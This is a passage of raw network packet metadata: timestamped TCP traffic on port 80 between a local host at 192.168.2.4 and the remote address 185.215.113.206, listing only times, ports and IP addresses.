Nov 15, 2024 14:09:25.806900024 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.806915045 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.806930065 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.806937933 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.806960106 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.882467031 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.882529020 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.882536888 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.882559061 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.882575035 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.882594109 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.883707047 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.883732080 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.883749962 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.883766890 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.883771896 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.883805037 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.883841991 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.884975910 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.884995937 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.885013103 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.885029078 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.885046959 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.885046959 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.885077953 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.885094881 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.886055946 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.886074066 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.886089087 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.886105061 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.886106014 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.886123896 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.886132002 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.886146069 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.886146069 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.886157036 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.886221886 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.888403893 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.888449907 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.931143999 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.938736916 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.222743034 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.222767115 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.222784996 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.222804070 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.222842932 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.222843885 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.223088026 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.223113060 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.223130941 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.223134041 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.223146915 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.223170996 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.224104881 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.224128962 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.224147081 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.224178076 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.224210024 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.225179911 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.225200891 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.225215912 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.225231886 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.225234985 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.225251913 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.225260973 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.225291014 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.225394011 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.225411892 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.225428104 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.225444078 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.225457907 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.225478888 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.226278067 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.226295948 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.226310968 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.226327896 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.226330042 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.226345062 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.226371050 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.226882935 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.226901054 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.226931095 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.226948977 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.226949930 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.226962090 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.226991892 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.227006912 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.227596045 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.227615118 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.227632046 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.227641106 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.227649927 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.227655888 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.227677107 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.227688074 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.228889942 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.228908062 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.228924036 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.228940010 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.228955030 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.228965044 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.228981018 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.229008913 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.229980946 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.229998112 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.230014086 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.230030060 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.230038881 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.230057001 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.230086088 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.230957985 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.230976105 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.230992079 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.231007099 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.231023073 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.231024027 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.231046915 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.231060982 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.231945038 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.231965065 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.231997967 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.232014894 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.232996941 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.233014107 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.233042002 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.233058929 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.234471083 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.234488010 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.234536886 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.234554052 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.235440969 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.235460043 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.235475063 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.235497952 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.235513926 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.236095905 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.236114979 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.236129999 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.236146927 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.236162901 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.237432957 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.237449884 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.237464905 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.237488031 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.237504005 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.238784075 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.238801003 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.238816023 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.238831043 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.238831997 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.238840103 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.238861084 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.238873959 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.240005016 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.240022898 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.240037918 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.240065098 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.240092039 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.241249084 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.241266966 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.241282940 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.241296053 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.241312981 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.241322041 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.241646051 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.241663933 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.241678953 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.241692066 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.241695881 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.241702080 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.241714954 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.241724968 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.241739988 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.241748095 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.244081974 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.244143009 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.346216917 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.346287012 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.346349001 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.346368074 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.346416950 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.347013950 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.347032070 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.347068071 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.347069025 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.347088099 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.347091913 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.347114086 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.347131014 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.348272085 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.348289013 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.348305941 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.348320961 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.348326921 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.348337889 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.348367929 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.350240946 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.350258112 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.350272894 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.350290060 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.350301027 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.350318909 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.350343943 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.351711035 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.351728916 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.351752043 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.351764917 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.351769924 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.351773024 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.351788044 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.351795912 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.351829052 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.353281975 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.353298903 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.353315115 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.353332043 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.353336096 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.353346109 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.353367090 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.355293036 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.355309963 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.355333090 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.355344057 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.355350018 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.355355978 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.355366945 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.355370998 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.355391979 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.355402946 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.356228113 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.356245041 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.356261015 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.356276989 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.356276989 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.356296062 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.356323957 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.358227968 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.358244896 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.358259916 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.358277082 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.358289957 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.358294010 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.358314991 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.358324051 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.358939886 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.358957052 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.358973026 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.358989000 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.358997107 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.359019995 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.359019995 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.359036922 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.361470938 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.361488104 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.361505032 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.361520052 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.361526012 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.361531973 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.361543894 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.361553907 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.361566067 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.361578941 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.361962080 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.361979961 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.361994982 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.362010002 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.362015009 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.362025976 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.362027884 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.362039089 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.362059116 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.362067938 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.363050938 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.363068104 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.363082886 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.363099098 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.363100052 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.363109112 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.363116026 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.363126993 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.363132954 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.363142014 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.363158941 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.363168001 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.364145994 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.364162922 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.364177942 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.364193916 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.364200115 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.364208937 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.364212036 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.364242077 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.364264011 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.365184069 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.365211010 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.365227938 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.365230083 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.365245104 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.365246058 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.365264893 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.365272999 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.365283966 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.365286112 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.365309000 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.365319014 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.366470098 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.366488934 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.366504908 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.366523027 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.366528988 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.366537094 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.366545916 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.366547108 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.366563082 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.366622925 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.367149115 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.367167950 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.367182016 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.367199898 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.367202997 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.367217064 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.367218018 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.367235899 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.367245913 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.367268085 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.367268085 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.367281914 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.368060112 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.368077040 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.368093014 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.368108988 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.368124008 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.368124008 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.368124962 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.368136883 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.368189096 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.368269920 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:26.368602037 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.368621111 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:26.368635893 CET	80	49752	185.215.113.206	192.168.2.4
